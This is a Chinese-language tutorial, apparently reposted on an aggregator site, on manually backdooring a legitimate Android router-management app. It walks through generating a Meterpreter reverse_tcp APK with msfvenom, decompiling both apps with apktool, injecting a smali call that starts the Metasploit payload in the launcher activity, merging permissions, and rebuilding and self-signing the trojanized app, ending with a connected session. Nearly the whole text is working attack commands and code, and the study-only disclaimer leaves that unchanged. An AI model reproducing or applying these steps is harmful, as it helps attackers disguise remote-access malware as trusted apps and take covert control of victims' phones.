admin管理员组文章数量:1636897
本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!!
前期的准备某路由器管理APP(luyou.apk)
kali Linux
手机(android 10)
01 生成Android shell
在生成之前,确定本机的ip地址。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk
这样我们便生成了一个名为66.apk的android shell
02 反编译刚才生成的shell和正常appapktool d 66.apk
apktool d luyou.apk
反编译后的效果
03 注入PAYLOAD
-1 进入luyou文件夹,打开AndroidManifest.xml文件
-2 搜索关键字Launch和Main找到所对应启动的smail文件,说白了就是找app启动文件路径
当前的启动路径为:com/mercury/mercuryrouterLaunchActivity
打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
04 将木马文件中的smali文件复制到载体smali文件夹中cp -r 66/smali/com/* luyou/smali/com/
05添加权限
打开木马AndroidManifest.xml文件
复制以
开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中,删除重复权限就ok
06回遍apktool b luyou
07签名
这样我们的app添加就算完成了,但是在手机是无法运行的。因为没有签名。
生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222
签名:jarsigner -keystore mykey.keystore luyou.apk alias_name -s
08 测试
安装app
msf终端成功上线
版权属于:逍遥子大表哥
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
版权声明:本文标题:android反编译工具mercury,手动给APP添加backdoor(msf) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1729237006a1192019.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论